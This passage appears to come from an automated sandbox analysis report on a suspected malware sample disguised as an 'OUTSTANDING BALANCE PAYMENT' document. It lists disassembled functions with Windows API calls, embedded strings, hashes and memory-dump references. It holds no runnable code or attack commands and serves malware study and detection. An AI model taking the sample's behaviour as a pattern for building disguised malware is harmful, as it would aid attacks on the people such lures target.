                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ColorLongWindow
                                                                  • String ID:
                                                                  • API String ID: 259745315-0
                                                                  • Opcode ID: 4cadd12f3e0175723112f075b65cea8c26a6fa263e221e015b128691e0057d39
                                                                  • Instruction ID: 71baaf8a33937caf749a39e1b2b24384f06d228f14eb0120f0559631300d2f1f
                                                                  • Opcode Fuzzy Hash: 4cadd12f3e0175723112f075b65cea8c26a6fa263e221e015b128691e0057d39
                                                                  • Instruction Fuzzy Hash: 0E4107300111449FDF265F68EDA9BB93BAAEB06731F144261FE658F1E2C7308C51EB21
                                                                  Function 002C690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                  • String ID:
                                                                  • API String ID: 136442275-0
                                                                  • Opcode ID: 3cb4edd2ac896b9c50ccaaf0947bfc54af4217ac9f61ac890f61593d85411dea
                                                                  • Instruction ID: 7a23e95202c3b4b7f6385abd79ed2424e81b7ef5b06c47d407086ef005954289
                                                                  • Opcode Fuzzy Hash: 3cb4edd2ac896b9c50ccaaf0947bfc54af4217ac9f61ac890f61593d85411dea
                                                                  • Instruction Fuzzy Hash: 12414F7689521CAFCF61DB90CC85DCA73BDEB49310F0041A7B649A2041EE30ABF58F50
                                                                  Function 002CD76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharLowerBuffW.USER32(0031DC00,0031DC00,0031DC00), ref: 002CD7CE
                                                                  • GetDriveTypeW.KERNEL32(?,00333A70,00000061), ref: 002CD898
                                                                  • _wcscpy.LIBCMT ref: 002CD8C2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                  • API String ID: 2820617543-1000479233
                                                                  • Opcode ID: 1ccc8c4b1daa5cecaea377443aa4f0bf4ce89d5fa6926807f15c29ad6cb28744
                                                                  • Instruction ID: b8a23f0ce4844333fe26f656ea8a33b3d4a0f65da39c477b061eeaa747e53898
                                                                  • Opcode Fuzzy Hash: 1ccc8c4b1daa5cecaea377443aa4f0bf4ce89d5fa6926807f15c29ad6cb28744
                                                                  • Instruction Fuzzy Hash: B1518235124201AFCB00EF14D891FAEB7A5FF84714F208A2EF49957292DB71DD25CB42
                                                                  Function 0028936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __swprintf.LIBCMT ref: 002893AB
                                                                  • __itow.LIBCMT ref: 002893DF
                                                                    • Part of subcall function 002A1557: _xtow@16.LIBCMT ref: 002A1578
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __itow__swprintf_xtow@16
                                                                  • String ID: %.15g$0x%p$False$True
                                                                  • API String ID: 1502193981-2263619337
                                                                  • Opcode ID: 114f550cae48ac1d37a2780c2316dd7f430b55b875d40e81a7833e038b0fa544
                                                                  • Instruction ID: cd9bb88650d7bb0800e898b6fdedc6f429c054e51b543d4b09f1f7f8645bc8f7
                                                                  • Opcode Fuzzy Hash: 114f550cae48ac1d37a2780c2316dd7f430b55b875d40e81a7833e038b0fa544
                                                                  • Instruction Fuzzy Hash: 5841F535531209ABDB24FF34D942E7AB3E8EF48350F2444BBE14AD71C1EAB19961CB10
                                                                  Function 002EA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 002EA259
                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 002EA260
                                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002EA273
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 002EA27B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 002EA286
                                                                  • DeleteDC.GDI32(00000000), ref: 002EA28F
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 002EA299
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002EA2AD
                                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 002EA2B9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                  • String ID: static
                                                                  • API String ID: 2559357485-2160076837
                                                                  • Opcode ID: ae6d051cba21b8742b25c325a9c10e562878e1914e7501a01f3dd912f0e4d341
                                                                  • Instruction ID: 931454ffd813bae3780a24ca16bdf6b5c3410df4b0c4112610eaa62941082800
                                                                  • Opcode Fuzzy Hash: ae6d051cba21b8742b25c325a9c10e562878e1914e7501a01f3dd912f0e4d341
                                                                  • Instruction Fuzzy Hash: F5319E31151119ABDF125FA5DC49FEB3BADFF09360F110215FA19A60A0CB36E821DBA4
                                                                  Function 002C6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                  • String ID: 0.0.0.0
                                                                  • API String ID: 2620052-3771769585
                                                                  • Opcode ID: c638a2e8cc11c47c8aae4a2becf0a75a00ad2af2407427c4670a7ba22858edee
                                                                  • Instruction ID: cb584d287412fd03d34aa729bb3ce09fbefe7c65cbdb103c5738930a4d9620f7
                                                                  • Opcode Fuzzy Hash: c638a2e8cc11c47c8aae4a2becf0a75a00ad2af2407427c4670a7ba22858edee
                                                                  • Instruction Fuzzy Hash: 4D110672914219ABCB26AFB0AC4EFDA77ACEF45710F00016EF046A6081EF70DE958B50
                                                                  Function 002A500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002A5047
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • __gmtime64_s.LIBCMT ref: 002A50E0
                                                                  • __gmtime64_s.LIBCMT ref: 002A5116
                                                                  • __gmtime64_s.LIBCMT ref: 002A5133
                                                                  • __allrem.LIBCMT ref: 002A5189
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002A51A5
                                                                  • __allrem.LIBCMT ref: 002A51BC
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002A51DA
                                                                  • __allrem.LIBCMT ref: 002A51F1
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002A520F
                                                                  • __invoke_watson.LIBCMT ref: 002A5280
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                  • String ID:
                                                                  • API String ID: 384356119-0
                                                                  • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction ID: 8c26513df32e2acc4acfefb8e2937ecfc7ebb0ca7b4bac4b6898fc922f5fb7de
                                                                  • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                  • Instruction Fuzzy Hash: C9711B72A10F27ABD7149E78CC41BAB73A8AF16364F144169F814D7681EF70DD608BD0
                                                                  Function 002C4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002C4DF8
                                                                  • GetMenuItemInfoW.USER32(00341708,000000FF,00000000,00000030), ref: 002C4E59
                                                                  • SetMenuItemInfoW.USER32(00341708,00000004,00000000,00000030), ref: 002C4E8F
                                                                  • Sleep.KERNEL32(000001F4), ref: 002C4EA1
                                                                  • GetMenuItemCount.USER32(?), ref: 002C4EE5
                                                                  • GetMenuItemID.USER32(?,00000000), ref: 002C4F01
                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 002C4F2B
                                                                  • GetMenuItemID.USER32(?,?), ref: 002C4F70
                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002C4FB6
                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C4FCA
                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002C4FEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                  • String ID:
                                                                  • API String ID: 4176008265-0
                                                                  • Opcode ID: 91987234e027701b67ec26c06ee72fff449019b26ffed133c9c2f53e98c235fd
                                                                  • Instruction ID: 08e88eaf44978b98a4feaac4940815c20cfe7c64b8cb00a245d11e448ac45f6e
                                                                  • Opcode Fuzzy Hash: 91987234e027701b67ec26c06ee72fff449019b26ffed133c9c2f53e98c235fd
                                                                  • Instruction Fuzzy Hash: FA61AE7192024AAFEB21EFA4CCA4FAF7BB8EB45304F14025DF801A7251D771AD60CB20
                                                                  Function 002E9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002E9C98
                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002E9C9B
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 002E9CBF
                                                                  • _memset.LIBCMT ref: 002E9CD0
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002E9CE2
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002E9D5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$LongWindow_memset
                                                                  • String ID:
                                                                  • API String ID: 830647256-0
                                                                  • Opcode ID: 991da65b7c9f50b199af2dcc0610345c1377ba5cc90407f81638eae0b99fe3f1
                                                                  • Instruction ID: f6fd47982117daeaac21b756175bab45c88c8d65ea470f2573b707842646cd4c
                                                                  • Opcode Fuzzy Hash: 991da65b7c9f50b199af2dcc0610345c1377ba5cc90407f81638eae0b99fe3f1
                                                                  • Instruction Fuzzy Hash: 69618AB5950248AFDB11DFA8CC81EEEB7B8EB09700F54019AFA04AB291C774AD91CF50
                                                                  Function 002B94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 002B94FE
                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 002B9549
                                                                  • VariantInit.OLEAUT32(?), ref: 002B955B
                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 002B957B
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 002B95BE
                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 002B95D2
                                                                  • VariantClear.OLEAUT32(?), ref: 002B95E7
                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 002B95F4
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002B95FD
                                                                  • VariantClear.OLEAUT32(?), ref: 002B960F
                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 002B961A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                  • String ID:
                                                                  • API String ID: 2706829360-0
                                                                  • Opcode ID: 8c5ed8e3744ffeb8d838a2833a0c500266abf44e4b8eb3ce62e4593da11081dc
                                                                  • Instruction ID: a0c2b02a9fbd31fe62d0585b27ca63d5dd57c6cd7347a1b09f8f573305fdbe98
                                                                  • Opcode Fuzzy Hash: 8c5ed8e3744ffeb8d838a2833a0c500266abf44e4b8eb3ce62e4593da11081dc
                                                                  • Instruction Fuzzy Hash: 7E415E35911219AFCB02EFE5D8849DEBBBDFF08354F108066E511A3261DB70EA95CFA1
                                                                  Function 002DBB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$_memset
                                                                  • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?3$|?3
                                                                  • API String ID: 2862541840-403901264
                                                                  • Opcode ID: 84dcf0ee49b7de9b8b228389fff23f4014a92e3e23e17f99d82b13c8b7c47024
                                                                  • Instruction ID: 984c105f4264fef6f25f75984dbdabf7e1830a1611f7e2c9df758e6b5f91450a
                                                                  • Opcode Fuzzy Hash: 84dcf0ee49b7de9b8b228389fff23f4014a92e3e23e17f99d82b13c8b7c47024
                                                                  • Instruction Fuzzy Hash: 1B917E71A20215EFDF26CFA5C854FAEBBB9AF45710F11815BE505AB280DB709D50CFA0
                                                                  Function 002DADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0028936C: __swprintf.LIBCMT ref: 002893AB
                                                                    • Part of subcall function 0028936C: __itow.LIBCMT ref: 002893DF
                                                                  • CoInitialize.OLE32 ref: 002DADF6
                                                                  • CoUninitialize.OLE32 ref: 002DAE01
                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,0030D8FC,?), ref: 002DAE61
                                                                  • IIDFromString.OLE32(?,?), ref: 002DAED4
                                                                  • VariantInit.OLEAUT32(?), ref: 002DAF6E
                                                                  • VariantClear.OLEAUT32(?), ref: 002DAFCF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                  • API String ID: 834269672-1287834457
                                                                  • Opcode ID: c75b27c783d18281ae2fc3a96176ff87d98653b6a85c124c71ab2af9db77e6f2
                                                                  • Instruction ID: c5b9b18b188a3b7267733093c2b4d51dfc5a65db64a5e3f7127294f897678178
                                                                  • Opcode Fuzzy Hash: c75b27c783d18281ae2fc3a96176ff87d98653b6a85c124c71ab2af9db77e6f2
                                                                  • Instruction Fuzzy Hash: E261BC712283029FD711EF54C888F6AB7E8AF88714F14495AF9859B391C770ED58CB93
                                                                  Function 002D8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WSAStartup.WSOCK32(00000101,?), ref: 002D8168
                                                                  • inet_addr.WSOCK32(?,?,?), ref: 002D81AD
                                                                  • gethostbyname.WSOCK32(?), ref: 002D81B9
                                                                  • IcmpCreateFile.IPHLPAPI ref: 002D81C7
                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002D8237
                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002D824D
                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 002D82C2
                                                                  • WSACleanup.WSOCK32 ref: 002D82C8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                  • String ID: Ping
                                                                  • API String ID: 1028309954-2246546115
                                                                  • Opcode ID: b9aee31a222ffa8d3a3eea363221423357e8d36f1b543480278c4e17f3cf3bc2
                                                                  • Instruction ID: 7c2fa512792fe1b74dbb0f0090a7aedbc73645527c1112ec90c5c250f4ce0acd
                                                                  • Opcode Fuzzy Hash: b9aee31a222ffa8d3a3eea363221423357e8d36f1b543480278c4e17f3cf3bc2
                                                                  • Instruction Fuzzy Hash: D251AF35624701AFDB11EF64CC49B2AB7E4AF48720F04896AFA59DB3A1DB70ED14CB41
                                                                  Function 002CE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 002CE396
                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 002CE40C
                                                                  • GetLastError.KERNEL32 ref: 002CE416
                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 002CE483
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                  • API String ID: 4194297153-14809454
                                                                  • Opcode ID: 1218b6ed571e3cdeef059db7b80cf9136c00175ad77a26fad436eee30f5867a1
                                                                  • Instruction ID: 56dbf92e00721a8bedb2b2f3bcb83328ffde9d03ddca837cb6dd0fb3ad710d25
                                                                  • Opcode Fuzzy Hash: 1218b6ed571e3cdeef059db7b80cf9136c00175ad77a26fad436eee30f5867a1
                                                                  • Instruction Fuzzy Hash: 8731A435A1020A9FDB19EFA8C889FBDB7B8EF04300F15811AE506E7291DB709A51CB51
                                                                  Function 002BB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 002BB98C
                                                                  • GetDlgCtrlID.USER32 ref: 002BB997
                                                                  • GetParent.USER32 ref: 002BB9B3
                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 002BB9B6
                                                                  • GetDlgCtrlID.USER32(?), ref: 002BB9BF
                                                                  • GetParent.USER32(?), ref: 002BB9DB
                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 002BB9DE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
